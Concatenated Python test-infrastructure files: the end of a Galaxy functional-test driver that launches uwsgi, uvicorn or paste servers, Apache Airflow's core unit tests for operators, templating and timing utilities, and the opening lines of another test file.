            uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
            # Prepend the uwsgi proxy section ahead of the dumped YAML.
            f.write(uwsgi_section)
            f.write(old_contents)

    def attempt_port_bind(port):
        # Build the uwsgi command line bound to the chosen port and spawn it
        # in its own process group (so stop() can signal the whole group).
        uwsgi_command = [
            "uwsgi",
            "--http",
            f"{host}:{port}",
            "--yaml",
            yaml_config_path,
            "--module",
            "galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
            "--enable-threads",
            "--die-on-term",
        ]
        for path in sys.path:
            uwsgi_command.append('--pythonpath')
            uwsgi_command.append(path)
        handle_uwsgi_cli_command = getattr(
            config_object, "handle_uwsgi_cli_command", None
        )
        if handle_uwsgi_cli_command is not None:
            handle_uwsgi_cli_command(uwsgi_command)
        # we don't want to quote every argument but we don't want to print unquoted ones either, so do this
        log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
        p = subprocess.Popen(
            uwsgi_command,
            cwd=galaxy_root,
            preexec_fn=os.setsid,
        )
        return UwsgiServerWrapper(
            p, name, host, port
        )

    port = attempt_ports(port)
    server_wrapper = attempt_port_bind(port)
    try:
        set_and_wait_for_http_target(prefix, host, port, url_prefix="/", sleep_tries=50)
        log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
        return server_wrapper
    except Exception:
        server_wrapper.stop()
        # Bug fix: the exception used to be swallowed here, silently returning
        # None to the caller - re-raise so startup failures are visible.
        raise
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
    """Build an embedded Galaxy app and serve it with uvicorn.

    :param webapp_factory: callable producing the WSGI webapp for the app.
    :param prefix: env-var prefix used to resolve host/port settings.
    :param galaxy_config: config dict used to build the Galaxy app.
    :param config_object: optional object consulted for test configuration.
    :returns: EmbeddedServerWrapper holding the app, server and serving thread.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    port = attempt_ports(port)
    gx_app = build_galaxy_app(galaxy_config)
    gx_wsgi_webapp = webapp_factory(
        galaxy_config['global_conf'],
        app=gx_app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False
    )
    # Wrap the WSGI app in the ASGI FastAPI application uvicorn serves.
    from galaxy.webapps.galaxy.fast_app import initialize_fast_app
    app = initialize_fast_app(gx_wsgi_webapp, gx_app)
    server, port, thread = uvicorn_serve(app, host=host, port=port)
    set_and_wait_for_http_target(prefix, host, port, url_prefix=gx_app.config.galaxy_url_prefix)
    log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}{gx_app.config.galaxy_url_prefix}")
    return EmbeddedServerWrapper(
        gx_app, server, name, host, port, thread=thread, prefix=gx_app.config.galaxy_url_prefix
    )
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch a web server for a given app using supplied factory.

    Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
    TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
    all set after this method has been called.

    :param app: already-constructed application object to serve.
    :param webapp_factory: callable producing the WSGI webapp for the app.
    :param kwargs: config dict; must provide 'global_conf'.
    :returns: EmbeddedServerWrapper for the started Paste server.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    webapp = webapp_factory(
        kwargs['global_conf'],
        app=app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False
    )
    server, port = serve_webapp(
        webapp,
        host=host, port=port
    )
    set_and_wait_for_http_target(prefix, host, port, url_prefix="/")
    log.info(f"Embedded paste web server for {name} started at {host}:{port}")
    return EmbeddedServerWrapper(
        app, server, name, host, port
    )
class TestDriver:
    """Responsible for the life-cycle of a Galaxy-style functional test.

    Sets up servers, configures tests, runs nose, and tears things
    down. This is somewhat like a Python TestCase - but different
    because it is meant to provide a main() endpoint.
    """
    __test__ = False  # Prevent pytest from discovering this class (issue #12071)

    def __init__(self):
        """Setup tracked resources."""
        self.server_wrappers = []
        self.temp_directories = []

    def setup(self):
        """Called before tests are built."""

    def build_tests(self):
        """After environment is setup, setup nose tests."""

    def tear_down(self):
        """Cleanup resources tracked by this object."""
        self.stop_servers()
        for tracked_dir in self.temp_directories:
            cleanup_directory(tracked_dir)

    def stop_servers(self):
        # Stop each tracked server in registration order, then forget them.
        for wrapper in self.server_wrappers:
            wrapper.stop()
        self.server_wrappers = []

    def mkdtemp(self):
        """Return a temp directory that is properly cleaned up or not based on the config."""
        path = tempfile.mkdtemp()
        self.temp_directories.append(path)
        return path

    def run(self):
        """Driver whole test.

        Setup environment, build tests (if needed), run test,
        and finally cleanup resources.
        """
        configure_environment()
        self.setup()
        self.build_tests()
        try:
            return 0 if nose_config_and_run() else 1
        except Exception:
            log.info("Failure running tests")
            raise
        finally:
            log.info("Shutting down")
            self.tear_down()
class GalaxyTestDriver(TestDriver):
    """Instantial a Galaxy-style nose TestDriver for testing Galaxy."""

    # True when the driver is exercising tool-shed-installed tools.
    testing_shed_tools = False

    def _configure(self, config_object=None):
        """Setup various variables used to launch a Galaxy server."""
        config_object = self._ensure_config_object(config_object)
        # When GALAXY_TEST_EXTERNAL is set, tests target that server instead
        # of launching an embedded one.
        self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
        # Allow a particular test to force uwsgi or any test to use uwsgi with
        # the GALAXY_TEST_UWSGI environment variable.
        use_uwsgi = bool(os.environ.get('GALAXY_TEST_UWSGI', None))
        if not use_uwsgi:
            if getattr(config_object, "require_uwsgi", None):
                use_uwsgi = True
        self.use_uwsgi = use_uwsgi
        # Otherwise fall back to uvicorn (ASGI) when enabled.
        if getattr(config_object, "use_uvicorn", USE_UVICORN):
            self.else_use_uvicorn = True
        else:
            self.else_use_uvicorn = False
        # Allow controlling the log format
        log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
        if not log_format and use_uwsgi:
            # Include uwsgi process/worker/mule ids in log lines.
            log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
                "[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
                "[%(threadName)s] %(message)s"
        self.log_format = log_format
        self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
        self.temp_directories.append(self.galaxy_test_tmp_dir)
        self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
        if getattr(config_object, "framework_tool_and_types", False):
            # Framework tests: use the sample tool + datatype configs.
            default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
            datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
        else:
            default_tool_conf = getattr(config_object, "default_tool_conf", None)
            datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
        allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
        self.allow_tool_conf_override = allow_tool_conf_override
        self.default_tool_conf = default_tool_conf
        self.datatypes_conf_override = datatypes_conf_override

    def setup(self, config_object=None):
        """Setup a Galaxy server for functional test (if needed).

        Configuration options can be specified as attributes on the supplied
        ```config_object``` (defaults to self).
        """
        self._saved_galaxy_config = None
        self._configure(config_object)
        self._register_and_run_servers(config_object)

    def restart(self, config_object=None, handle_config=None):
        """Stop running servers and relaunch (reusing the saved config)."""
        self.stop_servers()
        self._register_and_run_servers(config_object, handle_config=handle_config)

    def _register_and_run_servers(self, config_object=None, handle_config=None):
        # Launch (or target) a Galaxy server and record its wrapper for teardown.
        config_object = self._ensure_config_object(config_object)
        self.app = None
        if self.external_galaxy is None:
            if self._saved_galaxy_config is not None:
                # Restart case - reuse the config built on the first launch.
                galaxy_config = self._saved_galaxy_config
            else:
                tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
                # Configure the database path.
                galaxy_db_path = database_files_path(tempdir)
                # Allow config object to specify a config dict or a method to produce
                # one - other just read the properties above and use the default
                # implementation from this file.
                galaxy_config = getattr(config_object, "galaxy_config", None)
                if callable(galaxy_config):
                    galaxy_config = galaxy_config()
                if galaxy_config is None:
                    setup_galaxy_config_kwds = dict(
                        allow_path_paste=getattr(config_object, "allow_path_paste", False),
                        use_test_file_dir=not self.testing_shed_tools,
                        default_install_db_merged=True,
                        default_tool_conf=self.default_tool_conf,
                        datatypes_conf=self.datatypes_conf_override,
                        prefer_template_database=getattr(config_object, "prefer_template_database", False),
                        log_format=self.log_format,
                        conda_auto_init=getattr(config_object, "conda_auto_init", False),
                        conda_auto_install=getattr(config_object, "conda_auto_install", False),
                        use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
                        allow_tool_conf_override=self.allow_tool_conf_override,
                    )
                    galaxy_config = setup_galaxy_config(
                        galaxy_db_path,
                        **setup_galaxy_config_kwds
                    )
                    isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
                    if isolate_galaxy_config:
                        galaxy_config["config_dir"] = tempdir
                    # Save so restart() can relaunch with identical settings.
                    self._saved_galaxy_config = galaxy_config
            if galaxy_config is not None:
                # Give the caller one last chance to tweak the config.
                handle_galaxy_config_kwds = handle_config or getattr(
                    config_object, "handle_galaxy_config_kwds", None
                )
                if handle_galaxy_config_kwds is not None:
                    handle_galaxy_config_kwds(galaxy_config)
            if self.use_uwsgi:
                # NOTE(review): ``tempdir`` is unbound here when a saved config
                # is reused (restart path) - confirm restart()+uwsgi works.
                server_wrapper = launch_uwsgi(
                    galaxy_config,
                    tempdir=tempdir,
                    config_object=config_object,
                )
            elif self.else_use_uvicorn:
                server_wrapper = launch_uvicorn(
                    lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
                    galaxy_config=galaxy_config,
                    config_object=config_object,
                )
                self.app = server_wrapper.app
            else:
                # ---- Build Application --------------------------------------------------
                self.app = build_galaxy_app(galaxy_config)
                server_wrapper = launch_server(
                    self.app,
                    buildapp.app_factory,
                    galaxy_config,
                    config_object=config_object,
                )
            # NOTE(review): this branch just launched a test-managed server,
            # yet the message says "external" (and the branch below for the
            # external server says "test managed") - the two log strings look
            # swapped; confirm before relying on them.
            log.info(f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}")
            self.server_wrappers.append(server_wrapper)
        else:
            log.info(f"Functional tests will be run against test managed Galaxy server {self.external_galaxy}")
            # Ensure test file directory setup even though galaxy config isn't built.
            ensure_test_file_dir_set()

    def _ensure_config_object(self, config_object):
        # Default the config object to the driver itself.
        if config_object is None:
            config_object = self
        return config_object

    def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
        """Adjust the app's toolbox for migrated/installed tool shed tests."""
        setup_shed_tools_for_test(
            self.app,
            self.galaxy_test_tmp_dir,
            testing_migrated_tools,
            testing_installed_tools
        )

    def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
        """Generate nose test classes for the tools in the app's toolbox."""
        if self.app is None:
            return
        if testing_shed_tools is None:
            testing_shed_tools = getattr(self, "testing_shed_tools", False)
        # We must make sure that functional.test_toolbox is always imported after
        # database_contexts.galaxy_content is set (which occurs in this method above).
        # If functional.test_toolbox is imported before database_contexts.galaxy_content
        # is set, sa_session will be None in all methods that use it.
        import functional.test_toolbox
        functional.test_toolbox.toolbox = self.app.toolbox
        # When testing data managers, do not test toolbox.
        test_classes = functional.test_toolbox.build_tests(
            app=self.app,
            testing_shed_tools=testing_shed_tools,
            master_api_key=get_admin_api_key(),
            user_api_key=get_user_api_key(),
        )
        if return_test_classes:
            return test_classes
        return functional.test_toolbox

    def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
        """Run a single tool test against the running server via its API."""
        if resource_parameters is None:
            resource_parameters = {}
        # NOTE(review): host/port are unused here - only url is consumed.
        host, port, url = target_url_parts()
        galaxy_interactor_kwds = {
            "galaxy_url": url,
            "master_api_key": get_admin_api_key(),
            "api_key": get_user_api_key(),
            "keep_outputs_dir": None,
        }
        galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
        verify_tool(
            tool_id=tool_id,
            test_index=index,
            galaxy_interactor=galaxy_interactor,
            resource_parameters=resource_parameters,
            **kwd
        )
def drive_test(test_driver_class):
    """Instantiate driver class, run, and exit appropriately."""
    driver = test_driver_class()
    sys.exit(driver.run())
# Names re-exported as the public API of this module.
__all__ = (
    "copy_database_template",
    "build_logger",
    "drive_test",
    "FRAMEWORK_UPLOAD_TOOL_CONF",
    "FRAMEWORK_SAMPLE_TOOLS_CONF",
    "FRAMEWORK_DATATYPES_CONF",
    "database_conf",
    "get_webapp_global_conf",
    "nose_config_and_run",
    "setup_galaxy_config",
    "TestDriver",
    "wait_for_http_server",
)
|
test_core.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs
DEV_NULL = '/dev/null'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
    """
    An operator to test template substitution
    """
    # Fields listed here are rendered through Jinja before execute() runs.
    template_fields = ['some_templated_field']
    def __init__(self, some_templated_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Value (possibly containing Jinja templates) rendered at runtime.
        self.some_templated_field = some_templated_field
    def execute(self, context):
        # No-op: tests only inspect the rendered template_fields.
        pass
class TestCore(unittest.TestCase):
    """Smoke tests for core operators, template rendering, timing utilities
    and task-instance lifecycle, using the bundled example DAGs."""
    default_scheduler_args = {"num_runs": 1}
    def setUp(self):
        # Load the example DAGs so tests can reuse 'example_bash_operator'.
        self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True, read_dags_from_db=False)
        self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
        self.dag = DAG(TEST_DAG_ID, default_args=self.args)
        self.dag_bash = self.dagbag.dags['example_bash_operator']
        self.runme_0 = self.dag_bash.get_task('runme_0')
        self.run_after_loop = self.dag_bash.get_task('run_after_loop')
        self.run_this_last = self.dag_bash.get_task('run_this_last')
    def tearDown(self):
        # Delete every row created under TEST_DAG_ID so tests stay isolated.
        session = Session()
        session.query(DagRun).filter(
            DagRun.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.query(TaskInstance).filter(
            TaskInstance.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.query(TaskFail).filter(
            TaskFail.dag_id == TEST_DAG_ID).delete(
            synchronize_session=False)
        session.commit()
        session.close()
        clear_db_dags()
        clear_db_runs()
    def test_check_operators(self):
        # Exercise CheckOperator / ValueCheckOperator on a throwaway table.
        conn_id = "sqlite_default"
        captain_hook = BaseHook.get_hook(conn_id=conn_id)  # quite funny :D
        captain_hook.run("CREATE TABLE operator_test_table (a, b)")
        captain_hook.run("insert into operator_test_table values (1,2)")
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op = CheckOperator(
            task_id='check',
            sql="select count(*) from operator_test_table",
            conn_id=conn_id,
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        # pass_value=95 with tolerance=0.1 accepts anything in [85.5, 104.5].
        op = ValueCheckOperator(
            task_id='value_check',
            pass_value=95,
            tolerance=0.1,
            conn_id=conn_id,
            sql="SELECT 100",
            dag=self.dag)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        captain_hook.run("drop table operator_test_table")
    def test_clear_api(self):
        # clear() then are_dependents_done() must not raise.
        task = self.dag_bash.tasks[0]
        task.clear(
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
            upstream=True, downstream=True)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.are_dependents_done()
    def test_illegal_args(self):
        """
        Tests that Operators reject illegal arguments
        """
        msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
        with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
            # With the config flag on, unknown kwargs only warn.
            with self.assertWarns(PendingDeprecationWarning) as warning:
                BashOperator(
                    task_id='test_illegal_args',
                    bash_command='echo success',
                    dag=self.dag,
                    illegal_argument_1234='hello?')
                assert any(msg in str(w) for w in warning.warnings)
    def test_illegal_args_forbidden(self):
        """
        Tests that operators raise exceptions on illegal arguments when
        illegal arguments are not allowed.
        """
        with self.assertRaises(AirflowException) as ctx:
            BashOperator(
                task_id='test_illegal_args',
                bash_command='echo success',
                dag=self.dag,
                illegal_argument_1234='hello?')
        self.assertIn(
            ('Invalid arguments were passed to BashOperator '
             '(task_id: test_illegal_args).'),
            str(ctx.exception))
    def test_bash_operator(self):
        op = BashOperator(
            task_id='test_bash_operator',
            bash_command="echo success",
            dag=self.dag)
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_bash_operator_multi_byte_output(self):
        # \u2600 is a multi-byte UTF-8 character (the sun symbol).
        op = BashOperator(
            task_id='test_multi_byte_bash_operator',
            bash_command="echo \u2600",
            dag=self.dag,
            output_encoding='utf-8')
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_bash_operator_kill(self):
        import psutil
        # Embed our pid in the sleep duration so the child is identifiable.
        sleep_time = "100%d" % os.getpid()
        op = BashOperator(
            task_id='test_bash_operator_kill',
            execution_timeout=timedelta(seconds=1),
            bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
            dag=self.dag)
        self.assertRaises(
            AirflowTaskTimeout,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
        sleep(2)
        pid = -1
        for proc in psutil.process_iter():
            if proc.cmdline() == ['sleep', sleep_time]:
                pid = proc.pid
        # If the sleep survived the timeout, clean it up and fail the test.
        if pid != -1:
            os.kill(pid, signal.SIGTERM)
            self.fail("BashOperator's subprocess still running after stopping on timeout!")
    def test_on_failure_callback(self):
        # Annoying workaround for nonlocal not existing in python 2
        data = {'called': False}
        def check_failure(context, test_case=self):
            data['called'] = True
            error = context.get('exception')
            test_case.assertIsInstance(error, AirflowException)
        op = BashOperator(
            task_id='check_on_failure_callback',
            bash_command="exit 1",
            dag=self.dag,
            on_failure_callback=check_failure)
        self.assertRaises(
            AirflowException,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        self.assertTrue(data['called'])
    def test_dryrun(self):
        # dry_run() renders the command without executing it.
        op = BashOperator(
            task_id='test_dryrun',
            bash_command="echo success",
            dag=self.dag)
        op.dry_run()
    def test_sqlite(self):
        import airflow.providers.sqlite.operators.sqlite
        op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
            task_id='time_sqlite',
            sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
            dag=self.dag)
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_timeout(self):
        # A 5s sleep must trip the 1s execution_timeout.
        op = PythonOperator(
            task_id='test_timeout',
            execution_timeout=timedelta(seconds=1),
            python_callable=lambda: sleep(5),
            dag=self.dag)
        self.assertRaises(
            AirflowTaskTimeout,
            op.run,
            start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_python_op(self):
        # templates_dict entries must be Jinja-rendered before the call.
        def test_py_op(templates_dict, ds, **kwargs):
            if not templates_dict['ds'] == ds:
                raise Exception("failure")
        op = PythonOperator(
            task_id='test_py_op',
            python_callable=test_py_op,
            templates_dict={'ds': "{{ ds }}"},
            dag=self.dag)
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_complex_template(self):
        # Templates nested inside dicts/lists must be rendered too.
        def verify_templated_field(context):
            self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
                             context['ds'])
        op = OperatorSubclass(
            task_id='test_complex_template',
            some_templated_field={
                'foo': '123',
                'bar': ['baz', '{{ ds }}']
            },
            dag=self.dag)
        op.execute = verify_templated_field
        self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    def test_template_non_bool(self):
        """
        Test templates can handle objects with no sense of truthiness
        """
        class NonBoolObject:
            def __len__(self):  # pylint: disable=invalid-length-returned
                return NotImplemented
            def __bool__(self):  # pylint: disable=invalid-bool-returned, bad-option-value
                return NotImplemented
        op = OperatorSubclass(
            task_id='test_bad_template_obj',
            some_templated_field=NonBoolObject(),
            dag=self.dag)
        op.resolve_template_files()
    def test_task_get_template(self):
        # Run a task and verify every date-derived template variable.
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        ti.dag = self.dag_bash
        self.dag_bash.create_dagrun(
            run_type=DagRunType.MANUAL,
            state=State.RUNNING,
            execution_date=DEFAULT_DATE
        )
        ti.run(ignore_ti_state=True)
        context = ti.get_template_context()
        # DEFAULT DATE is 2015-01-01
        self.assertEqual(context['ds'], '2015-01-01')
        self.assertEqual(context['ds_nodash'], '20150101')
        # next_ds is 2015-01-02 as the dag interval is daily
        self.assertEqual(context['next_ds'], '2015-01-02')
        self.assertEqual(context['next_ds_nodash'], '20150102')
        # prev_ds is 2014-12-31 as the dag interval is daily
        self.assertEqual(context['prev_ds'], '2014-12-31')
        self.assertEqual(context['prev_ds_nodash'], '20141231')
        self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
        self.assertEqual(context['ts_nodash'], '20150101T000000')
        self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
        self.assertEqual(context['yesterday_ds'], '2014-12-31')
        self.assertEqual(context['yesterday_ds_nodash'], '20141231')
        self.assertEqual(context['tomorrow_ds'], '2015-01-02')
        self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
    def test_local_task_job(self):
        # A LocalTaskJob must run the task instance to completion.
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        job.run()
    def test_raw_job(self):
        # Running the TaskInstance directly (no job wrapper) must succeed.
        TI = TaskInstance
        ti = TI(
            task=self.runme_0, execution_date=DEFAULT_DATE)
        ti.dag = self.dag_bash
        self.dag_bash.create_dagrun(
            run_type=DagRunType.MANUAL,
            state=State.RUNNING,
            execution_date=DEFAULT_DATE
        )
        ti.run(ignore_ti_state=True)
    def test_round_time(self):
        # round_time snaps a datetime to the nearest interval boundary,
        # optionally relative to a given start date.
        rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
        self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
        rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
        self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
        rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
        rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
        rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
        rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
            2015, 9, 14, 0, 0))
        self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
    def test_infer_time_unit(self):
        # Unit is chosen so the magnitudes stay human-readable.
        self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
        self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
        self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
        self.assertEqual('days', infer_time_unit([200000, 100000]))
    def test_scale_time_units(self):
        # use assert_almost_equal from numpy.testing since we are comparing
        # floating point arrays
        arr1 = scale_time_units([130, 5400, 10], 'minutes')
        assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
        arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
        assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
        arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
        assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
                                  decimal=3)
        arr4 = scale_time_units([200000, 100000], 'days')
        assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
    def test_bad_trigger_rule(self):
        # Unknown trigger_rule values must be rejected at construction time.
        with self.assertRaises(AirflowException):
            DummyOperator(
                task_id='test_bad_trigger',
                trigger_rule="non_existent",
                dag=self.dag)
    def test_terminate_task(self):
        """If a task instance's db state get deleted, it should fail"""
        from airflow.executors.sequential_executor import SequentialExecutor
        TI = TaskInstance
        dag = self.dagbag.dags.get('test_utils')
        task = dag.task_dict.get('sleeps_forever')
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        job = LocalTaskJob(
            task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
        # Running task instance asynchronously
        proc = multiprocessing.Process(target=job.run)
        proc.start()
        sleep(5)
        # Dispose the engine so the forked child doesn't share connections.
        settings.engine.dispose()
        session = settings.Session()
        ti.refresh_from_db(session=session)
        # making sure it's actually running
        self.assertEqual(State.RUNNING, ti.state)
        ti = session.query(TI).filter_by(
            dag_id=task.dag_id,
            task_id=task.task_id,
            execution_date=DEFAULT_DATE
        ).one()
        # deleting the instance should result in a failure
        session.delete(ti)
        session.commit()
        # waiting for the async task to finish
        proc.join()
        # making sure that the task ended up as failed
        ti.refresh_from_db(session=session)
        self.assertEqual(State.FAILED, ti.state)
        session.close()
    def test_task_fail_duration(self):
        """If a task fails, the duration should be recorded in TaskFail"""
        op1 = BashOperator(
            task_id='pass_sleepy',
            bash_command='sleep 3',
            dag=self.dag)
        op2 = BashOperator(
            task_id='fail_sleepy',
            bash_command='sleep 5',
            execution_timeout=timedelta(seconds=3),
            retry_delay=timedelta(seconds=0),
            dag=self.dag)
        session = settings.Session()
        try:
            op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        try:
            op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:  # pylint: disable=broad-except
            pass
        op1_fails = session.query(TaskFail).filter_by(
            task_id='pass_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        op2_fails = session.query(TaskFail).filter_by(
            task_id='fail_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        self.assertEqual(0, len(op1_fails))
        self.assertEqual(1, len(op2_fails))
        # The recorded duration must cover at least the 3s timeout window.
        self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)
    def test_externally_triggered_dagrun(self):
        TI = TaskInstance
        # Create the dagrun between two "scheduled" execution dates of the DAG
        execution_date = DEFAULT_DATE + timedelta(days=2)
        execution_ds = execution_date.strftime('%Y-%m-%d')
        execution_ds_nodash = execution_ds.replace('-', '')
        dag = DAG(
            TEST_DAG_ID,
            default_args=self.args,
            schedule_interval=timedelta(weeks=1),
            start_date=DEFAULT_DATE)
        task = DummyOperator(task_id='test_externally_triggered_dag_context',
                             dag=dag)
        dag.create_dagrun(run_type=DagRunType.SCHEDULED,
                          execution_date=execution_date,
                          state=State.RUNNING,
                          external_trigger=True)
        task.run(
            start_date=execution_date, end_date=execution_date)
        ti = TI(task=task, execution_date=execution_date)
        context = ti.get_template_context()
        # next_ds/prev_ds should be the execution date for manually triggered runs
        self.assertEqual(context['next_ds'], execution_ds)
        self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
        self.assertEqual(context['prev_ds'], execution_ds)
        self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
|
part_test.py | import sys
import threading
sys.path.append('../../common')
from env_indigo import *
